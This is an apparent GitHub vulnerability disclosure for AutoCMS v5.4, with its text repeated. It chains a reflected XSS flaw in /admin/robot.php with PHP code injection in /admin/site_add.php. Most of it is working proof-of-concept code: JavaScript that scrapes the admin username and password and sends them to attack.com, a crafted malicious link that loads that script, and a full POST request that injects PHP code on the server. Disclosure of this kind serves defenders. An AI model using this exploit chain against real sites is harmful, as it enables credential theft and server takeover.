You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
AutoCMS v5.4 is affected by a Cross-Site Scripting (XSS) vulnerability and a PHP Code Injection vulnerability. The XSS vulnerability can be exploited to capture administrator credentials, which can then be used to exploit the PHP Code Injection vulnerability.
Details
Cross-Site Scripting (XSS) Vulnerability
Affected Component: /admin/robot.php
Description: The application fails to sufficiently sanitize and escape input parameters page and sidebar. An attacker can craft a malicious URL that, when accessed by an administrator, will execute arbitrary JavaScript code.
PHP Code Injection
Affected Component: /admin/site_add.php
Description: The application mishandles the txtsite_url parameter, allowing attackers to inject PHP code. By crafting a specific value for txtsite_url, an attacker can execute arbitrary PHP code on the server.
POC
1, Host a JavaScript file on the attacker's server.
JavaScript Payload Code:
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http(s)://target-ip/admin/index.php?sidebar=10', true);
xhr.onload = function() {
if (xhr.status >= 200 && xhr.status < 300) {
var parser = new DOMParser();
var doc = parser.parseFromString(xhr.responseText, 'text/html');
var username = doc.querySelector('input[name="txtusername"]').value;
var password = doc.querySelector('input[name="txtpassword"]').value;
var newUrl = 'http(s)://attack.com/log.php?username=' + encodeURIComponent(username) + '&password=' + encodeURIComponent(password);
var xhr2 = new XMLHttpRequest();
xhr2.open('GET', newUrl, true);
xhr2.onload = function() {
if (xhr2.status >= 200 && xhr2.status < 300) {
console.log('Okk!');
} else {
console.error('NO! Status:', xhr2.status);
}
};
xhr2.onerror = function() {
console.error('Network!');
};
xhr2.send();
} else {
console.error('NO!', xhr.status);
}
};
xhr.send();
2, Send a malicious URL to the target administrator: http(s)://target-ip/admin/robot.php?page=1&sidebar=1%22%3E%3CsCRiPt/SrC=//attack.com/1.js%3E
After the administrator clicks on the link, we will obtain the username and password, allowing us to log into the backend and exploit the code injection vulnerability to control the server.
3. Upon using the POC, we only need to access http(s)://target-ip/config/hebing123/config.php to see that we have successfully executed the phpinfo function.
POC:
POST /admin/site_add.php?save=ok HTTP/1.1
Host: target-ip
Content-Length: 951
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: [admin-cookie]
Accept-Language: zh-CN,zh;q=0.9
Connection: close
txtsiteurl=hebing123&txtsite_url=http%3A%2F%2Fwww.aaa.com&txttarget_url=1";%0dphpinfo();%0d$test="1&txtTDK=1&txtreplace_mode=0&txtTDKasc=0&txtindex_title=%E8%BF%99%E6%98%AF%E9%A6%96%E9%A1%B5%E6%A0%87%E9%A2%98&txtindex_keywords=&txtindex_description=&txtcapture_mode=0&txtanti_theft=1&txtuser_curl=1&txtuser_agent=baidu&txtother_agent=Mozilla%2F5.0+%28Windows+NT+6.2%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F32.0.1667.0+Safari%2F537.36&txtuser_client=auto&txtnochange=.zip%7C.rar%7C.avi%7C.jpg%7C.gif%7C.png&txtjump_mode=0&txtjump=http%3A%2F%2Fwww.so.com&txtjump_title=%E6%A1%86%E6%9E%B6%E8%B0%83%E7%94%A8%E6%A0%87%E9%A2%98&txtchange_link=0&txtlink_name=link.php&txturl_encode=1&txtnochange_url=127.0.0.1%7Cautocms.cn&txtcache_time=0&txtcache_index=0&txtcache_img=1&txtshield_spider=1&txtspider_tj=1&txtspider_name=semrushbot%2Cmj12bot%2Cteoma%2Ctwiceler%2Cscrubby%2Crobozilla%2Cgigabot%2Cahrefsbot%2Cpetalbot%2Cdotbot
The text was updated successfully, but these errors were encountered:
Summary
AutoCMS v5.4 is affected by a Cross-Site Scripting (XSS) vulnerability and a PHP Code Injection vulnerability. The XSS vulnerability can be exploited to capture administrator credentials, which can then be used to exploit the PHP Code Injection vulnerability.
Details
Cross-Site Scripting (XSS) Vulnerability
Affected Component: /admin/robot.php
Description: The application fails to sufficiently sanitize and escape input parameters page and sidebar. An attacker can craft a malicious URL that, when accessed by an administrator, will execute arbitrary JavaScript code.
PHP Code Injection
Affected Component: /admin/site_add.php
Description: The application mishandles the txtsite_url parameter, allowing attackers to inject PHP code. By crafting a specific value for txtsite_url, an attacker can execute arbitrary PHP code on the server.
POC
1, Host a JavaScript file on the attacker's server.
JavaScript Payload Code:
2, Send a malicious URL to the target administrator:
http(s)://target-ip/admin/robot.php?page=1&sidebar=1%22%3E%3CsCRiPt/SrC=//attack.com/1.js%3EAfter the administrator clicks on the link, we will obtain the username and password, allowing us to log into the backend and exploit the code injection vulnerability to control the server.
3. Upon using the POC, we only need to access
http(s)://target-ip/config/hebing123/config.phpto see that we have successfully executed the phpinfo function.POC:
The text was updated successfully, but these errors were encountered: